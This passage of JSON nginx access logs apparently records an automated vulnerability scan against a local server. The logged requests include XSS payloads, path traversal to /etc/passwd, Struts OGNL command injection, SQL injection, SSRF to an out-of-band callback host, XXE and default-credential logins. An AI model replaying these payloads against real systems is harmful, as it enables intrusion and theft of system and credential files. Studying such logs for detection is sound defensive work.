+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=aAev@WJYZ&url=http://c9oms3gsmpve1ijt0mc0o56og731zf8b1.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.096","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22logfile\x22; filename=\x22\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.453","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.503","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.407","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.100","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.438","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.496","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.776","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.249","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.500","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.453","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2228fHqLo0sONZJkOEEEt1m9qLO2C.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"page=login_change&oper=0&username=admin&password=conel&submit=Login","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.588","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.463","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php~ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.151","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.151","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.107","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.473","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.480","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.787","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.301","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.517","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:15 